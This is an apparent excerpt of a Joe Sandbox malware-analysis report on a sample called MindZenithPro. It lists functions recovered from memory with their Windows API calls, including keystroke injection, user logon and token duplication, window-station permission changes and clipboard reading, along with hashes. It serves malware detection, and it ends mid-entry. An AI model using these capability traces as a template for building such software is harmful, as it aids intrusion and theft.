                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: afe4c09aa15d00e444c18fc885576bd21e574b69c0d25de41bce653829b809c4
                                    • Instruction ID: 03c59f5602539e5a5404dec672bacaad1ffec485317b2b70e040d9b8d8d9d459
                                    • Opcode Fuzzy Hash: afe4c09aa15d00e444c18fc885576bd21e574b69c0d25de41bce653829b809c4
                                    • Instruction Fuzzy Hash: C0F039B1501B51CFCB359F64D490916BBE5AF163263248E3EE2D786A61CB3AAC80DF44
                                    Function 003C56AA Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                    • Instruction ID: 6a7a1090f67ee5b1e000548b484ca209f0e7355d323b55032332a820e4b388a3
                                    • Opcode Fuzzy Hash: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                    • Instruction Fuzzy Hash: 18F0F87540020DFFDF05DF90C941EAE7BB9FB14318F208549F9159A251D336EA61ABA1
                                    Function 003C2F14 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 003C2F70
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_
                                    • String ID:
                                    • API String ID: 1144537725-0
                                    • Opcode ID: dc6cf2162d067c79bc09f23a0f94d4054724eb124da2aaad99f88b200985dca4
                                    • Instruction ID: ab3318926d89a81a9e8e609a885fcbb6eb97cf6424803d0b28b9a51934f9e523
                                    • Opcode Fuzzy Hash: dc6cf2162d067c79bc09f23a0f94d4054724eb124da2aaad99f88b200985dca4
                                    • Instruction Fuzzy Hash: F9F0A770904358AFDB639F34DC45B967BFCA701708F0401BAA58896182D7B44BC4CF85
                                    Function 003C318A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003C31A9
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LongNamePath_wcslen
                                    • String ID:
                                    • API String ID: 541455249-0
                                    • Opcode ID: 6396b5e69d3fabd2c29391f0ba18b3aeab69ad2fe50720ce1bb3f290efeead9a
                                    • Instruction ID: f5ba40d9d5a3100eb8505c12dfffed92029317d21ed6d41c90f8c574d605a588
                                    • Opcode Fuzzy Hash: 6396b5e69d3fabd2c29391f0ba18b3aeab69ad2fe50720ce1bb3f290efeead9a
                                    • Instruction Fuzzy Hash: E3E0CD729002245BC7219399DC06FDA77DDDFC8790F0400B5FC09D7244D974DD808694
                                    Function 0042E568 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0042E581
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FolderPath_wcslen
                                    • String ID:
                                    • API String ID: 2987691875-0
                                    • Opcode ID: 85a6ac3b8a509ae148fc6c0d313189cc0c7ea503c6fd6a44bdb14eeb4c20b715
                                    • Instruction ID: 21d07144a001b0b6e7723d6bf887e1a849a50d21c15af03d235566ff3da2454a
                                    • Opcode Fuzzy Hash: 85a6ac3b8a509ae148fc6c0d313189cc0c7ea503c6fd6a44bdb14eeb4c20b715
                                    • Instruction Fuzzy Hash: 9ED05EA19003282BDF64A7759C0DDB73AACCB40210F0006A0786DD3152E930ED448AA0
                                    Function 00431015 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00070FFB,00000000,00000000,?), ref: 00431030
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: ecbc0cc424ff1b93c16d82b58baa630b46d80c5d81447b4dd2ff7cba40f9b700
                                    • Instruction ID: 2a2dabe3e2a2f03be45545db4a7e5cb487016518269cccd10c9141902f78657e
                                    • Opcode Fuzzy Hash: ecbc0cc424ff1b93c16d82b58baa630b46d80c5d81447b4dd2ff7cba40f9b700
                                    • Instruction Fuzzy Hash: 07D0A7B1426314BF9B3CCB50CD0ACA776ACE905651740263FB442D2A40F9F0FD00CAB4
                                    Function 003C1727 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 003C1736
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem
                                    • String ID:
                                    • API String ID: 3098949447-0
                                    • Opcode ID: cad2b5d873de8e138bd26e2b12193e9879b1eea6152d069c0655607f3733b898
                                    • Instruction ID: 10164dc36a0e46b06576a77658ec7d50cbfb0316e8525ba51c696c10738ec601
                                    • Opcode Fuzzy Hash: cad2b5d873de8e138bd26e2b12193e9879b1eea6152d069c0655607f3733b898
                                    • Instruction Fuzzy Hash: B9C09B31280304FFE2305B90BD4AF15B764D718711F008473BA05551F383F15410DA18

                                    Non-executed Functions

                                    Function 00459C62 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00459D06
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00459D47
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00459D8B
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00459DB5
                                    • SendMessageW.USER32 ref: 00459DDE
                                    • GetKeyState.USER32(00000011), ref: 00459E77
                                    • GetKeyState.USER32(00000009), ref: 00459E84
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00459E9A
                                    • GetKeyState.USER32(00000010), ref: 00459EA4
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00459ED5
                                    • SendMessageW.USER32 ref: 00459EFC
                                    • SendMessageW.USER32(?,00001030,?,00458581), ref: 0045A004
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0045A01A
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0045A02D
                                    • SetCapture.USER32(?), ref: 0045A036
                                    • ClientToScreen.USER32(?,?), ref: 0045A09B
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0045A0A8
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0045A0C2
                                    • ReleaseCapture.USER32 ref: 0045A0CD
                                    • GetCursorPos.USER32(?), ref: 0045A105
                                    • ScreenToClient.USER32(?,?), ref: 0045A112
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0045A16C
                                    • SendMessageW.USER32 ref: 0045A19A
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0045A1D7
                                    • SendMessageW.USER32 ref: 0045A206
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0045A227
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0045A236
                                    • GetCursorPos.USER32(?), ref: 0045A254
                                    • ScreenToClient.USER32(?,?), ref: 0045A261
                                    • GetParent.USER32(?), ref: 0045A27F
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0045A2E6
                                    • SendMessageW.USER32 ref: 0045A317
                                    • ClientToScreen.USER32(?,?), ref: 0045A370
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0045A3A0
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0045A3CA
                                    • SendMessageW.USER32 ref: 0045A3ED
                                    • ClientToScreen.USER32(?,?), ref: 0045A43A
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0045A46E
                                      • Part of subcall function 003D9B74: GetWindowLongW.USER32(?,000000EB), ref: 003D9B82
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045A4F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3429851547-4164748364
                                    • Opcode ID: bf69483695c48921960ead8d2fa8f255772b96a9cd4e4a0bdff8d40cebd6693f
                                    • Instruction ID: 1dc684285d334177bb91a709d6c60aecef1ad18e5a779a280010c4cdac7c791f
                                    • Opcode Fuzzy Hash: bf69483695c48921960ead8d2fa8f255772b96a9cd4e4a0bdff8d40cebd6693f
                                    • Instruction Fuzzy Hash: 9D42BE70604344EFC725CF28C884EAABBE5FF48315F14062AF956872A2D775DC59CB4A
                                    Function 003DF64C Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131threadkeyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 003DF656
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003DF673
                                    • IsIconic.USER32(00000000), ref: 003DF67C
                                    • SetForegroundWindow.USER32(00000000), ref: 003DF68E
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003DF6A4
                                    • GetCurrentThreadId.KERNEL32 ref: 003DF6AB
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003DF6B7
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 003DF6C8
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 003DF6D0
                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 003DF6D8
                                    • SetForegroundWindow.USER32(00000000), ref: 003DF6DB
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF6F4
                                    • keybd_event.USER32(00000012,00000000), ref: 003DF6FF
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF709
                                    • keybd_event.USER32(00000012,00000000), ref: 003DF70E
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF717
                                    • keybd_event.USER32(00000012,00000000), ref: 003DF71C
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 003DF726
                                    • keybd_event.USER32(00000012,00000000), ref: 003DF72B
                                    • SetForegroundWindow.USER32(00000000), ref: 003DF72E
                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 003DF74C
                                    • AttachThreadInput.USER32(?,00000000,00000000), ref: 003DF754
                                    • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 003DF75C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1155518417-2988720461
                                    • Opcode ID: 310c19391cb826288d2924c6c470efbd53711daa86a39baa25d8c0ed796a6139
                                    • Instruction ID: 993debc23793b9280bd86a83e793fc6170fa5e8a64de094d5f4f164cf783bcd2
                                    • Opcode Fuzzy Hash: 310c19391cb826288d2924c6c470efbd53711daa86a39baa25d8c0ed796a6139
                                    • Instruction Fuzzy Hash: 23316272E40318BEEB316BB55C89FBE7E6CEF44B51F110076FA01E62D1D6B09D40AA64
                                    Function 004218E3 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00421DA5: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00421DEF
                                      • Part of subcall function 00421DA5: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00421E1C
                                      • Part of subcall function 00421DA5: GetLastError.KERNEL32 ref: 00421E2C
                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00421968
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0042198A
                                    • CloseHandle.KERNEL32(?), ref: 0042199B
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004219B3
                                    • GetProcessWindowStation.USER32 ref: 004219CC
                                    • SetProcessWindowStation.USER32(00000000), ref: 004219D6
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004219F2
                                      • Part of subcall function 004217A1: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004218DE), ref: 004217B6
                                      • Part of subcall function 004217A1: CloseHandle.KERNEL32(?,?,004218DE), ref: 004217CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                    • String ID: $default$winsta0
                                    • API String ID: 22674027-1027155976
                                    • Opcode ID: 979007cd2bb67fc9cae55bae65de76771a859636f8c10552b99df0cee622de4e
                                    • Instruction ID: b90ac892e1e8b03132ba3f373e3de9ec9c69cccd709f279047bb8aeeb4489969
                                    • Opcode Fuzzy Hash: 979007cd2bb67fc9cae55bae65de76771a859636f8c10552b99df0cee622de4e
                                    • Instruction Fuzzy Hash: 2A819071A00318ABDF219FA4EC49FEF7FB8EF14305F14412AF900A62A1D7799955CB18
                                    Function 00421244 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004217DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004217F6
                                      • Part of subcall function 004217DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421802
                                      • Part of subcall function 004217DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421811
                                      • Part of subcall function 004217DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,0042127D,?,?,?), ref: 00421818
                                      • Part of subcall function 004217DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0042182F
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004212AE
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004212E2
                                    • GetLengthSid.ADVAPI32(?), ref: 004212F9
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00421333
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0042134F
                                    • GetLengthSid.ADVAPI32(?), ref: 00421366
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 0042136E
                                    • HeapAlloc.KERNEL32(00000000), ref: 00421375
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00421396
                                    • CopySid.ADVAPI32(00000000), ref: 0042139D
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004213CC
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004213EE
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00421400
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421427
                                    • HeapFree.KERNEL32(00000000), ref: 0042142E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421437
                                    • HeapFree.KERNEL32(00000000), ref: 0042143E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00421447
                                    • HeapFree.KERNEL32(00000000), ref: 0042144E
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0042145A
                                    • HeapFree.KERNEL32(00000000), ref: 00421461
                                      • Part of subcall function 00421875: GetProcessHeap.KERNEL32(00000008,00421293,?,00000000,?,00421293,?), ref: 00421883
                                      • Part of subcall function 00421875: HeapAlloc.KERNEL32(00000000,?,00000000,?,00421293,?), ref: 0042188A
                                      • Part of subcall function 00421875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00421293,?), ref: 00421899
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: 38d2d091e33f5c6bc262364374fdbd22b123c154425d974727579cbbfd642651
                                    • Instruction ID: c22fc24eec56510f86ce250896cf5715b2899909d3fccee62b514d96478b6399
                                    • Opcode Fuzzy Hash: 38d2d091e33f5c6bc262364374fdbd22b123c154425d974727579cbbfd642651
                                    • Instruction Fuzzy Hash: 80718D71A00229ABDF20DFA1EC44FAFBBB8BF14715F444126E918E72A1D774D901CBA4
                                    Function 0043F286 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(0045DC1C), ref: 0043F2B0
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0043F2BE
                                    • GetClipboardData.USER32(0000000D), ref: 0043F2CA
                                    • CloseClipboard.USER32 ref: 0043F2D6
                                    • GlobalLock.KERNEL32(00000000), ref: 0043F30E
                                    • CloseClipboard.USER32 ref: 0043F318
                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0043F343
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0043F350
                                    • GetClipboardData.USER32(00000001), ref: 0043F358
                                    • GlobalLock.KERNEL32(00000000), ref: 0043F369
                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 0043F3A9
                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0043F3BF
                                    • GetClipboardData.USER32(0000000F), ref: 0043F3CB
                                    • GlobalLock.KERNEL32(00000000), ref: 0043F3DC
                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0043F3FE
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0043F41B
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0043F459
                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0043F47A
                                    • CountClipboardFormats.USER32 ref: 0043F49B
                                    • CloseClipboard.USER32 ref: 0043F4E0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                    • String ID:
                                    • API String ID: 420908878-0
                                    • Opcode ID: 3efe970f9ab261b9a6a5c5fa8f83aadde2a3ffece483681af5a53b5da84c655a
                                    • Instruction ID: 1ea337bd991fe42c3e58a847c35013d645b4a11ac303b24eda8e5455cc8dec0f
                                    • Opcode Fuzzy Hash: 3efe970f9ab261b9a6a5c5fa8f83aadde2a3ffece483681af5a53b5da84c655a
                                    • Instruction Fuzzy Hash: BD61C134600301AFC311EF24D884F2BB7A4AF98305F14456EF856CB2A2DB35ED4ACB66
                                    Function 004370FE Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0043712D
                                    • FindClose.KERNEL32(00000000), ref: 00437181
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004371BD
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004371E4
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00437221
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0043724E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                    • API String ID: 3830820486-3289030164
                                    • Opcode ID: 24e73b68e05e9b7ff750724059ba16c48e6904665cc29441f7e862dde8c842ba
                                    • Instruction ID: 4f846efd10931e6fbe29b891300c92ab669d8ea8bbaa27dcc44ebf4abd2bb32f
